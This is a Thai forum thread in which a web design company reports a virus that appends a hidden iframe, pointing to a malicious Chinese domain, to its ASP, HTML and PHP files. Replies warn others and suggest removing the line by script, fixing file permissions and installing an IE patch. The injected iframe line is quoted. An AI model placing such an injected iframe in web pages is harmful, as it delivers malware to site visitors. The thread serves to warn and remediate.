เป็นไวรัสหรือเปล่าครับ มันเจาะจงไฟล์ของเวบโดยเฉพาะ

วันนี้งานที่ไฟล์ภาษา .asp, .html., .htm, .php ที่ Office ผม บริษัทผมรับทำเวบนะครับ โดนฝั่งด้วย

<iframe src=“http//www.88kv.cn/mm/index.htm” …> อย่าเปิดนะครับไวรัส

จากที่ได้ค้นหาวิธีและได้ดูจากกระทู้ pantip กับ google ก็เจอกันเยอะนะครับ โดยจะเป็นชื่อ newheur_pe หรือ ชื่อลิงค์เวบ http//www.88kv.cn/mm/index.htm นะครับ

ดีที่ฝั่งไว้เครื่องเดียวของ webdesign สงสัยคงไปเปิดอะไรเข้าเลยมา ถ้าในวงแลนเปิดไฟล์เวบนี้ก็จะโดนด้วย แต่ถ้าเปิด nod32 หรือ antivirus ไว้จะ Block ไว้ได้ครับ ที่ดูจากเวบอื่นๆ และเห็นถามในกระทู้ pantip ก็เยอะ โดนกันเยอะนะครับ ระวังหน่อยนะครับ

มันเล่นฝั่งในไฟล์เวบเลยครับทุก ยังแก้ไม่ได้ ดีที่มี backup ไว้ จึงเรียนมาหากท่านได้มีวิธีแก้ไขอย่างไร โปรดแนะนำด้วยครับ และโปรดระวังตัวนี้ด้วย หากเปิด Dreamweaver แล้วกดสร้างหน้าใหม่ โค๊ด <iframe > ดังกล่าวก็จะแนบไปพร้อมไฟล์ใหม่ทันทีครับ โดยจะต่อท้ายโค๊ดบรรทัดสุดท้าย

ตามไปดูที่กระทู้นี้ครับ http://www.thaihosttalk.com/th1/index.php?topic=4650.0

รู้สึกจะเป็นคล้ายๆ กัน น่าจะมีวิธีแก้ครับ

  • เขียน script ขึ้นมาลบบรรทัดนั้นโดยเฉพาะ
  • และให้แก้ permission file ให้ถูกต้อง

สำหรับผู้ใช้ IE ให้ install update นี้ครับ http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx